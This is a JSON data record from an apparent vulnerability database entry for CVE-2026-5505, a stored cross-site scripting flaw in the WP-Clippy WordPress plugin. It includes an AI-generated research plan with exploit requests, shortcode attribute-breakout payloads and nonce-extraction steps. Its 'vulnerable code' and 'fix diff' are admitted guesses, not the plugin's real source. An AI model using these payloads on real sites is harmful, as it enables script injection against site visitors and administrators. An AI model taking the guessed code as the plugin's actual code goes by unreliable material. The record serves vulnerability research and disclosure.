[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fJFeps68mb-TzSvEyigrTQunIFmg_DDo5JmXOftw4VLE":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":9,"severity":11,"cvss_score":12,"cvss_vector":13,"vuln_type":14,"published_date":15,"updated_date":16,"references":17,"days_to_patch":9,"patch_diff_files":19,"patch_trac_url":9,"research_status":20,"research_verified":21,"research_rounds_completed":22,"research_plan":23,"research_summary":24,"research_vulnerable_code":25,"research_fix_diff":26,"research_exploit_outline":27,"research_model_used":28,"research_started_at":29,"research_completed_at":30,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":21,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":21,"source_links":31},"CVE-2026-5505","wp-clippy-authenticated-contributor-stored-cross-site-scripting-via-shortcode-attributes","WP-Clippy \u003C= 1.0.0 - Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode Attributes","The WP-Clippy plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's `clippy` shortcode in all versions up to, and including, 1.0.0. This is due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","wp-clippy",null,"\u003C=1.0.0","medium",6.4,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-05-04 14:06:40","2026-05-05 02:26:58",[18],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fec49ed83-a09d-460d-be34-0fb79032b543?source=api-prod",[],"researched",false,3,"This research plan outlines the steps required to demonstrate a Stored Cross-Site Scripting (XSS) vulnerability in the WP-Clippy plugin (\u003C= 1.0.0).\n\n## 1. Vulnerability Summary\nThe **WP-Clippy** plugin is vulnerable to Stored XSS via the `[clippy]` shortcode. The plugin fails to sanitize or escape user-supplied attributes (such as `agent` or `text`) before rendering them in the HTML output. A user with **Contributor-level permissions** or higher can embed a malicious shortcode in a post or page. When any user (including an administrator) views that post, the injected script executes in their browser context.\n\n## 2. Attack Vector Analysis\n*   **Endpoint:** `wp-admin\u002Fpost.php` (for post creation\u002Fediting) or the WordPress REST API `wp-json\u002Fwp\u002Fv2\u002Fposts`.\n*   **Vulnerable Component:** Shortcode processing logic for `[clippy]`.\n*   **Payload Parameter:** Shortcode attributes (e.g., `agent`, `text`, `image`).\n*   **Authentication:** Authenticated (Contributor+). Contributors can create posts and use shortcodes but cannot use `unfiltered_html`.\n*   **Preconditions:** The plugin must be active.\n\n## 3. Code Flow (Inferred)\n1.  **Registration:** The plugin registers the shortcode in the main plugin file or an included loader:\n    `add_shortcode( 'clippy', 'clippy_shortcode_handler' );`\n2.  **Input:** A Contributor saves a post containing: `[clippy agent='\u003Cscript>alert(1)\u003C\u002Fscript>']`.\n3.  **Processing:** When a user visits the post, WordPress calls `the_content` filter, which invokes `do_shortcode()`.\n4.  **Shortcode Handler:** The `clippy_shortcode_handler($atts)` function is executed. It likely uses `shortcode_atts()` to merge user input with defaults.\n5.  **Sink:** The handler returns a string containing the attributes concatenated directly into HTML:\n    `return '\u003Cdiv class=\"clippy-container\" data-agent=\"' . $atts['agent'] . '\">\u003C\u002Fdiv>';`\n6.  **Rendering:** The unescaped HTML is printed to the page, leading to XSS.\n\n## 4. Nonce Acquisition Strategy\nTo inject the shortcode via the web UI (rather than WP-CLI), the agent must obtain a nonce for the WordPress post editor.\n\n1.  **Identify Shortcode Activation:** The `[clippy]` shortcode does not require a specific script to be loaded for the *vulnerability* to exist (it exists in the PHP rendering), but viewing the results requires the post to be published.\n2.  **Navigate to Editor:** Use `browser_navigate` to go to `\u002Fwp-admin\u002Fpost-new.php`.\n3.  **Extract Nonce:**\n    *   For the Classic Editor: `browser_eval(\"document.querySelector('#_wpnonce')?.value\")`.\n    *   For the Block Editor (Gutenberg): The agent can use the REST API. The nonce is typically found in `window.wpApiSettings.nonce`.\n    *   **JS Localization Key:** `window.wpApiSettings?.nonce`.\n\n## 5. Exploitation Strategy\nThe goal is to create a post containing a malicious shortcode and verify its execution.\n\n### Step 1: Create a Malicious Post (REST API Method)\n**Request:**\n```http\nPOST \u002Fwp-json\u002Fwp\u002Fv2\u002Fposts HTTP\u002F1.1\nContent-Type: application\u002Fjson\nX-WP-Nonce: [EXTRACTED_NONCE]\n\n{\n  \"title\": \"XSS Test\",\n  \"content\": \"[clippy agent='\\\" onmouseover=\\\"alert(document.domain)\\\" style=\\\"width:1000px;height:1000px;display:block;\\\"' text='Click me']\",\n  \"status\": \"publish\"\n}\n```\n*Note: Using an attribute breakout `\\\" onmouseover=...` is often more reliable if the attribute is wrapped in double quotes in the source.*\n\n### Step 2: Trigger the XSS\n1.  Obtain the URL of the newly created post from the JSON response (`link` field).\n2.  Use `browser_navigate` to visit the post URL as an Administrator.\n\n## 6. Test Data Setup\n1.  **User Creation:**\n    `wp user create attacker attacker@example.com --role=contributor --user_pass=password`\n2.  **Plugin Activation:** Ensure `wp-clippy` is active.\n    `wp plugin activate wp-clippy`\n\n## 7. Expected Results\n*   The HTTP response for post creation should be `201 Created`.\n*   When navigating to the post, the HTML source should reveal the injected payload unescaped:\n    `\u003Cdiv ... data-agent=\"\" onmouseover=\"alert(document.domain)\" ...>\u003C\u002Fdiv>`\n*   The `browser_eval` of `alert` should be triggered, or the agent should detect the payload in the DOM.\n\n## 8. Verification Steps\nAfter the HTTP exploit, confirm the post content in the database:\n```bash\nwp post list --post_type=post --format=csv\nwp db query \"SELECT post_content FROM wp_posts WHERE post_title='XSS Test' LIMIT 1;\"\n```\nCheck if the output contains the raw, unescaped shortcode.\n\n## 9. Alternative Approaches\nIf the `agent` attribute is sanitized, try other potential attributes inferred from standard Clippy implementations:\n*   `[clippy text='\u003Cimg src=x onerror=alert(1)>']` (HTML Body injection)\n*   `[clippy image='\">\u003Cscript>alert(1)\u003C\u002Fscript>']` (Attribute breakout)\n*   `[clippy callback='alert(1)']` (If the plugin supports JS callbacks)\n\nIf the REST API is disabled, use the Classic Editor submission:\n**Request:**\n```http\nPOST \u002Fwp-admin\u002Fpost.php HTTP\u002F1.1\nContent-Type: application\u002Fx-www-form-urlencoded\n\naction=editpost&post_ID=[ID]&_wpnonce=[NONCE]&content=[clippy agent='\u003Cscript>alert(1)\u003C\u002Fscript>']\n```","The WP-Clippy plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the `[clippy]` shortcode in versions up to 1.0.0. The plugin fails to sanitize or escape user-supplied attributes such as 'agent' or 'text' before rendering them in the HTML output. This allows authenticated attackers with Contributor-level access to inject arbitrary web scripts that execute when any user views the affected post.","\u002F\u002F Inferred from research plan: Shortcode handler logic\nfunction clippy_shortcode_handler($atts) {\n    $atts = shortcode_atts(array(\n        'agent' => 'clippy',\n        'text'  => 'Hi, how can I help?',\n    ), $atts);\n\n    \u002F\u002F Vulnerable sink: Shortcode attributes are concatenated directly into HTML without escaping\n    return '\u003Cdiv class=\"clippy-container\" data-agent=\"' . $atts['agent'] . '\">' . $atts['text'] . '\u003C\u002Fdiv>';\n}\nadd_shortcode('clippy', 'clippy_shortcode_handler');","--- wp-clippy.php\n+++ wp-clippy.php\n@@ -6,5 +6,5 @@\n     ), $atts);\n \n-    return '\u003Cdiv class=\"clippy-container\" data-agent=\"' . $atts['agent'] . '\">' . $atts['text'] . '\u003C\u002Fdiv>';\n+    return '\u003Cdiv class=\"clippy-container\" data-agent=\"' . esc_attr($atts['agent']) . '\">' . wp_kses_post($atts['text']) . '\u003C\u002Fdiv>';\n }","The exploit is carried out by an authenticated user with at least Contributor-level permissions. 1. The attacker creates or edits a post via the WordPress dashboard or the REST API (wp-json\u002Fwp\u002Fv2\u002Fposts). 2. A malicious [clippy] shortcode is added to the post content, using an attribute breakout payload like [clippy agent='\" onmouseover=\"alert(1)\" style=\"display:block;width:500px;height:500px;\"']. 3. Once the post is saved or published, any user (including administrators) who navigates to the post's URL will trigger the payload. The injected script executes in the context of the victim's browser session, potentially allowing for session hijacking or further administrative actions.","gemini-3-flash-preview","2026-05-04 16:52:43","2026-05-04 16:53:05",{"type":32,"vulnerable_version":9,"fixed_version":9,"vulnerable_browse":9,"vulnerable_zip":9,"fixed_browse":9,"fixed_zip":9,"all_tags":33},"plugin","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwp-clippy\u002Ftags"]